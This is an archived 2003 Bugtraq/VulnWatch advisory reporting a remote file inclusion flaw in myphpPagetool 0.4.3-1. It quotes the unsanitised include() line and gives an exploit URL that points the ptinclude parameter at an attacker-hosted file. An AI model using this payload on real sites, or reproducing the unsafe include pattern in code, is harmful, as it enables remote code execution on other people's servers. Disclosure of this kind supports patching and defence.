[VulnWatch] myphpPagetool (php)

From: Frog Man (leseulfrog@hotmail.com)
Date: 02/02/03

  • Next message: Frog Man: "[VulnWatch] phpMyShop (php)"
    From: "Frog Man" <leseulfrog@hotmail.com>
    To: bugtraq@securityfocus.com
    Date: Sun, 02 Feb 2003 18:06:43 +0100
    
    

    Informations :
    같같같같같같같
    Version : 0.4.3-1
    Website : http://myphppagetool.sourceforge.net/
    Problem : Include file

    PHP Code/Location :
    같같같같같같같같같
    In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php,
    help4.php, help5.php, help6.php, help7.php, help8.php and help9.php :

    ----------------------------------------
    <?php
    include ($ptinclude . "/pt_config.inc");
    [...]
    ----------------------------------------

    Exploit :
    같같같같
    http://[target]/doc/admin/index.php?ptinclude=http://[attacker]
    with :
    http://[attacker]/pt_config.inc

    (if registers_global=ON)

    Solution :
    같같같같같
    A patch has been published on http://www.phpsecure.info .

    More details :
    같같같같같같같
    In French :
    http://www.frog-man.org/tutos/myphpPagetool.txt
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FmyphpPagetool.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools1 +0100 (CET)

    frog-m@n

    _________________________________________________________________
    MSN Search, le moteur de recherche qui pense comme vous !
    http://search.fr.msn.be